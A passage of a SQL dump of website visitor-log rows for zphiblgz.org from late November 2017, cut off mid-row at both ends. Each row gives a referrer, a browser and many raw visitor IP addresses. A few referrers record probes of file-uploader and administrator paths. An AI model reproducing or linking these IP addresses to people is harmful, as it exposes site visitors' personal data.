ttps://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.23','000',1,0),(14402,'2017-11-25','https://zphiblgz.org','Chrome','Windows','13.0.782.24','','213.183.51.194','000',2,0),(14403,'2017-11-25','https://zphiblgz.org','Chrome','Macintosh','19.0.1047.0','','213.183.51.194','000',1,0),(14404,'2017-11-25','https://zphiblgz.org','Chrome','Macintosh','19.0.1036.7','','213.183.51.194','000',1,0),(14405,'2017-11-25','https://zphiblgz.org','Chrome','Windows','15.0.860.0','','213.183.51.194','000',1,0),(14406,'2017-11-25','https://zphiblgz.org','Chrome','Macintosh','10.0.648.0','','213.183.51.194','000',2,0),(14407,'2017-11-25','https://zphiblgz.org','Chrome','Windows','15.0.864.0','','213.183.51.194','000',2,0),(14408,'2017-11-25','https://zphiblgz.org','Chrome','Windows','16.0.912.77','','213.183.51.194','000',1,0),(14409,'2017-11-25','https://zphiblgz.org','Chrome','Windows','11.0.696.3','','213.183.51.194','000',2,0),(14410,'2017-11-25','https://zphiblgz.org','Chrome','Macintosh','19.0.1055.1','','213.183.51.194','000',1,0),(14411,'2017-11-25','https://zphiblgz.org','Chrome','Macintosh','12.0.742.68','','213.183.51.194','000',1,0),(14412,'2017-11-25','https://zphiblgz.org','Chrome','Windows','17.0.963.65','','213.183.51.194','000',1,0),(14413,'2017-11-25','https://zphiblgz.org','Chrome','Windows','14.0.792.0','','213.183.51.194','000',1,0),(14414,'2017-11-25','https://zphiblgz.org','Chrome','Windows','17.0.963.66','','213.183.51.194','000',1,0),(14415,'2017-11-25','https://zphiblgz.org','Chrome','Windows','11.0.652.0','','213.183.51.194','000',1,0),(14416,'2017-11-25','http://www.zphibmaryland.org/chapters/','Chrome','Windows','62.0.3202.94','','75.182.11.235','000',3,0),(14417,'2017-11-25','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(14418,'2017-11-25','https://zphiblgz.org/','Chrome','iPhone','62.0.3202.70','','100.15.160.57','000',1,0),(14419,'2017-11-25','https://zphiblgz.org','Chrome','Windows','49.0.2623.110','','204.12.206.10','000',2,0),(14420,'2017-11-25','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',2,0),(14421,'2017-11-25','https://zphiblgz.org','Firefox','Windows','40.1','','188.112.107.127','000',3,0),(14422,'2017-11-26','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.219.178.100','000',2,0),(14423,'2017-11-26','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',104,0),(14424,'2017-11-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','128.199.157.152','000',2,0),(14425,'2017-11-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.238.163.173','000',10,0),(14426,'2017-11-26','https://zphiblgz.org','Chrome','Windows','55.0.2883.87','','107.191.62.198','000',3,0),(14427,'2017-11-26','https://zphiblgz.org','Safari','Macintosh','10.0.3','','107.191.62.198','000',1,0),(14428,'2017-11-26','https://zphiblgz.org','Firefox','Windows','40.1','','41.42.223.0','000',3,0),(14429,'2017-11-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.36','000',7,0),(14430,'2017-11-26','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.36','000',1,0),(14431,'2017-11-26','https://zphiblgz.org','Firefox','Windows','40.1','','115.137.181.124','000',3,0),(14432,'2017-11-26','https://zphiblgz.org','Chrome','Chrome OS','62.0.3202.82','','69.143.35.179','000',2,0),(14433,'2017-11-26','https://zphiblgz.org','Chrome','Windows','54.0.2840.99','','186.129.110.132','000',1,0),(14434,'2017-11-26','https://zphiblgz.org','Firefox','Windows','53.0','','54.175.179.218','000',4,0),(14435,'2017-11-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(14436,'2017-11-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.197.192.231','000',2,0),(14437,'2017-11-26','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.30','000',2,0),(14438,'2017-11-26','https://www.google.com/','Chrome','Android','62.0.3202.84','','68.134.7.245','000',2,0),(14439,'2017-11-26','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.194','000',1,0),(14440,'2017-11-26','https://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',4,0),(14441,'2017-11-26','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','54.36.222.37','000',1,0),(14442,'2017-11-26','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','71.121.233.203','000',11,0),(14443,'2017-11-26','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.195.134','000',2,0),(14444,'2017-11-26','http://l.instagram.com/?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&e=ATPZMretrMbcAgIBDAGbGwV4eZ1-e2KcFqVlcHkK59ze3mrEtvjPrnPR5xHNp0a_EGH1TrVoKh7BtkE','AppleWebKit','iPhone','604.3.5','','71.120.1.224','000',8,0),(14445,'2017-11-26','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.228','000',2,0),(14446,'2017-11-27','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','185.170.42.18','000',2,0),(14447,'2017-11-27','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',263,0),(14448,'2017-11-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.208.83.50','000',1,0),(14449,'2017-11-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','91.238.160.158','000',1,0),(14450,'2017-11-27','http://site.ru','Chrome','Windows','5.0.375.99','','93.191.156.24','000',2,0),(14451,'2017-11-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.130.18.107','000',1,0),(14452,'2017-11-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.16.183','000',1,0),(14453,'2017-11-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','91.208.99.2','000',1,0),(14454,'2017-11-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.127.160','000',1,0),(14455,'2017-11-27','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','185.107.81.233','000',1,0),(14456,'2017-11-27','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','166.70.207.2','000',1,0),(14457,'2017-11-27','https://zphiblgz.org','Firefox','Windows','20.0','','78.46.156.169','000',1,0),(14458,'2017-11-27','https://zphiblgz.org','Firefox','Macintosh','3.6.2','','13.93.219.241','000',2,0),(14459,'2017-11-27','https://zphiblgz.org','Firefox','Macintosh','49.0','','54.172.142.145','000',1,0),(14460,'2017-11-27','https://zphiblgz.org','Firefox','Macintosh','49.0','','54.86.133.72','000',2,0),(14461,'2017-11-27','http://zphiblgz.org/scholarship/','Chrome','Macintosh','62.0.3202.94','','71.121.233.203','000',2,0),(14462,'2017-11-27','https://zphiblgz.org','MSIE','Windows','11.0','','121.81.15.9','000',2,0),(14463,'2017-11-27','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','162.213.3.221','000',2,0),(14464,'2017-11-27','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','96.241.198.53','000',6,0),(14465,'2017-11-27','https://zphiblgz.org','Firefox','Macintosh','49.0','','54.175.24.52','000',3,0),(14466,'2017-11-27','https://zphiblgz.org/','MSIE','Windows','11.0','','73.191.57.222','000',1,0),(14467,'2017-11-27','https://t.co/UGy854pPnQ','Safari','iPhone','10.0','','69.143.35.179','000',6,0),(14468,'2017-11-27','https://zphiblgz.org','Firefox','Windows','3.5.6','','144.76.23.213','000',2,0),(14469,'2017-11-27','https://zphiblgz.org','MSIE','Windows','11.0','','12.189.199.68','000',1,0),(14470,'2017-11-27','https://www.google.com/','Chrome','Windows','62.0.3202.94','','66.90.164.132','000',3,0),(14471,'2017-11-27','https://zphiblgz.org','Firefox','Macintosh','49.0','','54.235.28.149','000',2,0),(14472,'2017-11-27','https://zphiblgz.org','Firefox','Windows','40.1','','188.175.24.184','000',3,0),(14473,'2017-11-27','https://zphiblgz.org','MSIE','Windows','6.0','','185.173.178.189','000',1,0),(14474,'2017-11-27','https://zphiblgz.org','Safari','iPhone','10.0','','174.226.32.20','000',4,0),(14475,'2017-11-27','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(14476,'2017-11-27','https://www.google.com/','Chrome','Windows','62.0.3202.94','','139.182.217.107','000',2,0),(14477,'2017-11-27','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14478,'2017-11-27','http://zphiblgz.org/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','Chrome','Windows','42.0.2311.152','','207.244.157.138','000',1,0),(14479,'2017-11-27','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','212.129.34.118','000',2,0),(14480,'2017-11-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',6,0),(14481,'2017-11-27','https://zphiblgz.org','Firefox','Windows','34.0','','62.192.247.163','000',1,0),(14482,'2017-11-27','https://www.google.com/','Safari','Macintosh','10.0.2','','166.91.10.210','000',4,0),(14483,'2017-11-27','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','96.234.147.182','000',9,0),(14484,'2017-11-27','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','194.44.247.218','000',2,0),(14485,'2017-11-27','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.228','000',2,0),(14486,'2017-11-27','https://zphiblgz.org','Firefox','Macintosh','27.0','','138.128.3.47','000',2,0),(14487,'2017-11-27','https://zphiblgz.org','Firefox','Windows','40.1','','82.76.95.211','000',3,0),(14488,'2017-11-27','zphiblgz.org','Firefox','Macintosh','16.0','','92.222.29.57','000',2,0),(14489,'2017-11-27','zphiblgz.org','Firefox','Macintosh','16.0','','188.165.193.197','000',2,0),(14490,'2017-11-27','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','71.121.233.203','000',2,0),(14491,'2017-11-27','https://zphiblgz.org','Safari','iPad','11.0','','71.121.204.212','000',7,0),(14492,'2017-11-27','https://zphiblgz.org','Firefox','Windows','50.0','','192.187.115.90','000',1,0),(14493,'2017-11-28','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','192.36.27.6','000',1,0),(14494,'2017-11-28','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','155.4.230.97','000',1,0),(14495,'2017-11-28','zphiblgz.org','Chrome','Windows','47.0.1335.75','','37.187.132.5','000',1,0),(14496,'2017-11-28','http://site.ru','Chrome','Windows','5.0.375.99','','92.61.157.140','000',2,0),(14497,'2017-11-28','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',28,0),(14498,'2017-11-28','https://zphiblgz.org','Chrome','Windows','24.0.1309.0','','46.105.103.59','000',1,0),(14499,'2017-11-28','https://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','146.185.140.250','000',5,0),(14500,'2017-11-28','https://zphiblgz.org','Firefox','Windows','40.1','','49.144.194.164','000',3,0),(14501,'2017-11-28','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','51.15.79.107','000',1,0),(14502,'2017-11-28','http://zphiblgz.org/','Safari','Macintosh','10.1','','104.247.7.3','000',3,0),(14503,'2017-11-28','https://zphiblgz.org/','Opera','Windows','12.17','','104.247.7.3','000',6,0),(14504,'2017-11-28','http://zphiblgz.org/','PHP','Unknown','Unknown','','104.247.7.3','000',1,0),(14505,'2017-11-28','https://zphiblgz.org','Chrome','Android','26.0.1410.58','','163.172.139.161','000',16,0),(14506,'2017-11-28','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.159.157','000',2,0),(14507,'2017-11-28','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.90.90','000',5,0),(14508,'2017-11-28','http://site.ru','Chrome','Windows','5.0.375.99','','89.111.176.241','000',1,0),(14509,'2017-11-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.22.220','000',2,0),(14510,'2017-11-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.31.114','000',2,0),(14511,'2017-11-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.63','000',2,0),(14512,'2017-11-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.12','000',2,0),(14513,'2017-11-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.92','000',2,0),(14514,'2017-11-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.196.239','000',2,0),(14515,'2017-11-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.26','000',1,0),(14516,'2017-11-28','https://zphiblgz.org','Firefox','Windows','40.1','','177.68.144.108','000',3,0),(14517,'2017-11-28','https://zphiblgz.org','Chrome','Windows','26.0.1410.43','','163.172.163.85','000',8,0),(14518,'2017-11-28','https://zphiblgz.org','Chrome','Windows','26.0.1410.43','','51.15.43.205','000',1,0),(14519,'2017-11-28','https://zphiblgz.org','Edge','Windows','15.15063','','50.225.39.88','000',13,0),(14520,'2017-11-28','https://zphiblgz.org','Firefox','Windows','40.1','','186.103.221.35','000',3,0),(14521,'2017-11-28','https://zphiblgz.org','Firefox','Windows','40.1','','103.253.209.130','000',3,0),(14522,'2017-11-28','https://zphiblgz.org/','Chrome','Windows','58.0.3029.81','','134.249.51.83','000',2,0),(14523,'2017-11-28','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','137.200.32.6','000',3,0),(14524,'2017-11-28','https://zphiblgz.org','Firefox','Macintosh','3.6.2','','158.69.252.228','000',2,0),(14525,'2017-11-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(14526,'2017-11-28','https://www.google.com/','Edge','Windows','16.16299','','71.16.78.30','000',4,0),(14527,'2017-11-28','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','37.115.194.38','000',1,0),(14528,'2017-11-28','https://zphiblgz.org','Firefox','Macintosh','12.0','','108.170.22.41','000',3,0),(14529,'2017-11-28','https://zphiblgz.org/','Opera Next','Windows','44.0.2510.857','','46.118.125.107','000',2,0),(14530,'2017-11-28','https://zphiblgz.org','Safari','iPhone','11.0','','173.69.155.28','000',2,0),(14531,'2017-11-28','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.9.157.194','000',2,0),(14532,'2017-11-28','https://www.google.com/','Chrome','Chrome OS','59.0.3071.91','','96.234.182.174','000',2,0),(14533,'2017-11-28','https://www.google.com/','Chrome','Windows','62.0.3202.94','','70.174.40.102','000',5,0),(14534,'2017-11-28','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(14535,'2017-11-28','http://zphiblgz.org/','Opera Next','Windows','43.0.2442.1144','','46.161.9.3','000',3,0),(14536,'2017-11-28','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.129.36','000',2,0),(14537,'2017-11-28','https://zphiblgz.org','Firefox','Windows','40.1','','175.139.131.139','000',3,0),(14538,'2017-11-29','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',18,0),(14539,'2017-11-29','https://zphiblgz.org','Chrome','Macintosh','26.0.1410.43','','51.15.70.226','000',2,0),(14540,'2017-11-29','https://zphiblgz.org','Chrome','Macintosh','26.0.1410.43','','92.222.6.12','000',2,0),(14541,'2017-11-29','https://zphiblgz.org','Chrome','Macintosh','26.0.1410.43','','162.243.166.137','000',1,0),(14542,'2017-11-29','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',1,0),(14543,'2017-11-29','http://www.zphiblgz.org/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','Chrome','Windows','42.0.2311.152','','207.244.157.139','000',2,0),(14544,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.246','000',2,0),(14545,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.22.19','000',2,0),(14546,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.30','000',2,0),(14547,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.130','000',2,0),(14548,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.1.139','000',2,0),(14549,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.173','000',2,0),(14550,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.208','000',1,0),(14551,'2017-11-29','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14552,'2017-11-29','https://zphiblgz.org','Safari','iPhone','6.0','','106.38.241.142','000',2,0),(14553,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.2.204','000',1,0),(14554,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.172','000',2,0),(14555,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.85','000',2,0),(14556,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.23.209','000',2,0),(14557,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.224','000',2,0),(14558,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.50','000',2,0),(14559,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.22.21','000',2,0),(14560,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.128','000',1,0),(14561,'2017-11-29','http://zphiblgz.org/administrator/index.php','Opera','Windows','12.14','','31.6.26.238','000',1,0),(14562,'2017-11-29','https://zphiblgz.org','Firefox','Windows','34.0','','136.169.129.117','000',1,0),(14563,'2017-11-29','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.242','000',2,0),(14564,'2017-11-29','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.46.105','000',1,0),(14565,'2017-11-29','https://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','54.183.157.47','000',2,0),(14566,'2017-11-29','https://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','13.57.47.188','000',32,0),(14567,'2017-11-29','http://zphiblgz.org/','Chrome','Macintosh','57.0.2987.133','','163.172.4.153','000',1,0),(14568,'2017-11-29','https://zphiblgz.org/','Chrome','Macintosh','58.0.3029.96','','163.172.4.153','000',1,0),(14569,'2017-11-29','https://zphiblgz.org','Firefox','Windows','32.0','','195.154.169.173','000',1,0),(14570,'2017-11-29','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','50.62.177.94','000',2,0),(14571,'2017-11-29','https://zphiblgz.org','Firefox','Windows','46.0','','146.185.223.25','000',1,0),(14572,'2017-11-29','https://zphiblgz.org','Chrome','Chrome OS','62.0.3202.82','','69.143.35.179','000',1,0),(14573,'2017-11-29','https://zphiblgz.org','Firefox','Windows','40.1','','210.212.251.166','000',3,0),(14574,'2017-11-29','https://zphiblgz.org','Chrome','Macintosh','36.0.1944.0','','165.227.206.8','000',1,0),(14575,'2017-11-29','https://zphiblgz.org','MSIE','Windows','6.0','','185.82.216.210','000',1,0),(14576,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.165','000',2,0),(14577,'2017-11-29','http://www.baidu.com/s?wd=C2HS','Firefox','Windows','43.0','','123.125.143.11','000',1,0),(14578,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.142','000',2,0),(14579,'2017-11-29','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','46.252.158.52','000',2,0),(14580,'2017-11-29','https://zphiblgz.org','Firefox','Windows','40.1','','186.223.139.138','000',3,0),(14581,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.70','000',2,0),(14582,'2017-11-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(14583,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.241','000',2,0),(14584,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.90','000',2,0),(14585,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.21','000',1,0),(14586,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.23.106','000',2,0),(14587,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.22.133','000',1,0),(14588,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.1.5','000',2,0),(14589,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.221','000',2,0),(14590,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.177','000',2,0),(14591,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.153','000',2,0),(14592,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.196.96','000',2,0),(14593,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.194','000',1,0),(14594,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.46','000',1,0),(14595,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.177','000',2,0),(14596,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.208','000',2,0),(14597,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.76.78.215','000',2,0),(14598,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.213','000',2,0),(14599,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.103','000',2,0),(14600,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.64','000',2,0),(14601,'2017-11-29','https://www.google.com/','Safari','iPhone','11.0','','74.106.235.51','000',4,0),(14602,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.67','000',2,0),(14603,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.78','000',2,0),(14604,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.60','000',2,0),(14605,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.66','000',2,0),(14606,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.172','000',2,0),(14607,'2017-11-29','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.2.36','000',2,0),(14608,'2017-11-29','https://zphiblgz.org','Safari','iPhone','11.0','','71.121.204.212','000',1,0),(14609,'2017-11-29','http://zphiblgz.org','Safari','Macintosh','10.1','','198.23.250.32','000',2,0),(14610,'2017-11-29','https://zphiblgz.org/','Opera','Windows','12.17','','198.23.250.32','000',6,0),(14611,'2017-11-29','http://zphiblgz.org/','PHP','Unknown','Unknown','','198.23.250.32','000',1,0),(14612,'2017-11-29','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(14613,'2017-11-29','http://zphiblgz.org/','MSIE','Windows','11.0','','107.150.95.12','000',1,0),(14614,'2017-11-30','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',48,0),(14615,'2017-11-30','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','198.211.122.41','000',2,0),(14616,'2017-11-30','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.116','000',2,0),(14617,'2017-11-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','112.243.123.199','000',16,0),(14618,'2017-11-30','http://google.com','Firefox','Windows','40.0','','206.180.165.147','000',2,0),(14619,'2017-11-30','http://site.ru','Chrome','Windows','5.0.375.99','','50.116.73.24','000',2,0),(14620,'2017-11-30','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','153.31.113.20','000',4,0),(14621,'2017-11-30','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','71.179.165.166','000',3,0),(14622,'2017-11-30','https://lm.facebook.com/','Chrome','Android','62.0.3202.84','','166.137.244.56','000',1,0),(14623,'2017-11-30','https://lm.facebook.com/','Chrome','Android','62.0.3202.84','','107.77.204.81','000',2,0),(14624,'2017-11-30','https://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',3,0),(14625,'2017-11-30','https://zphiblgz.org','Chrome','Windows','62.0.3202.89','','214.36.0.135','000',1,0),(14626,'2017-11-30','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','157.7.106.10','000',2,0),(14627,'2017-11-30','zphiblgz.org','Chrome','Windows','47.0.1335.75','','106.187.98.143','000',2,0),(14628,'2017-11-30','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','50.225.39.78','000',6,0),(14629,'2017-11-30','https://zphiblgz.org','MSIE','Windows','6.0','','139.59.149.99','000',1,0),(14630,'2017-11-30','http://www.zphibmaryland.org/chapters/','Chrome','Windows','62.0.3202.94','','69.195.247.116','000',3,0),(14631,'2017-11-30','https://zphiblgz.org','Firefox','Windows','10.0.1','','91.250.39.226','000',1,0),(14632,'2017-11-30','https://zphiblgz.org','Chrome','Linux','33.0.1772.75','','146.185.223.25','000',1,0),(14633,'2017-11-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(14634,'2017-11-30','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','160.153.153.16','000',2,0),(14635,'2017-11-30','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(14636,'2017-11-30','http://www.google.com/','Chrome','Android','62.0.3202.84','','107.77.203.4','000',4,0),(14637,'2017-11-30','https://zphiblgz.org','Firefox','Windows','40.1','','109.172.15.29','000',3,0),(14638,'2017-11-30','http://www.zphibmaryland.org/chapters/','Chrome','Android','62.0.3202.84','','166.216.165.15','000',1,0),(14639,'2017-11-30','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','212.83.182.255','000',2,0),(14640,'2017-11-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.36.117.185','000',2,0),(14641,'2017-11-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(14642,'2017-11-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.214','000',2,0),(14643,'2017-11-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(14644,'2017-11-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.127.226.150','000',1,0),(14645,'2017-11-30','https://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.74.253','000',1,0),(14646,'2017-11-30','http://site.ru','Chrome','Windows','5.0.375.99','','67.212.240.177','000',3,0),(14647,'2017-11-30','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.180.241.3','000',2,0),(14648,'2017-11-30','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14649,'2017-11-30','https://www.google.com/','Chrome','Windows','62.0.3202.62','','152.119.218.14','000',2,0),(14650,'2017-11-30','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','184.168.200.159','000',2,0),(14651,'2017-11-30','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(14652,'2017-11-30','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','100.15.165.179','000',3,0),(14653,'2017-12-01','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',82,0),(14654,'2017-12-01','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',2,0),(14655,'2017-12-01','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.51','000',2,0),(14656,'2017-12-01','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.35','000',1,0),(14657,'2017-12-01','https://zphiblgz.org','MSIE','Windows','7.0','','174.127.133.21','000',2,0),(14658,'2017-12-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.59','000',13,0),(14659,'2017-12-01','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','91.205.174.229','000',2,0),(14660,'2017-12-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.62','000',2,0),(14661,'2017-12-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.234','000',2,0),(14662,'2017-12-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.66','000',2,0),(14663,'2017-12-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.213','000',2,0),(14664,'2017-12-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.4','000',2,0),(14665,'2017-12-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.31.247','000',1,0),(14666,'2017-12-01','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.90','000',2,0),(14667,'2017-12-01','https://zphiblgz.org','python-requests','Unknown','2.7.0','','54.186.140.227','000',7,0),(14668,'2017-12-01','https://zphiblgz.org','Safari','Linux','534.34','','54.186.140.227','000',1,0),(14669,'2017-12-01','https://www.google.com/','Safari','iPhone','11.0','','198.204.189.245','000',2,0),(14670,'2017-12-01','http://zphiblgz.org/','Firefox','Windows','27.0','','195.22.125.74','000',3,0),(14671,'2017-12-01','http://l.instagram.com/?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&e=ATM_6hdXFWG9dgXuaY774bXJr9NibMTxk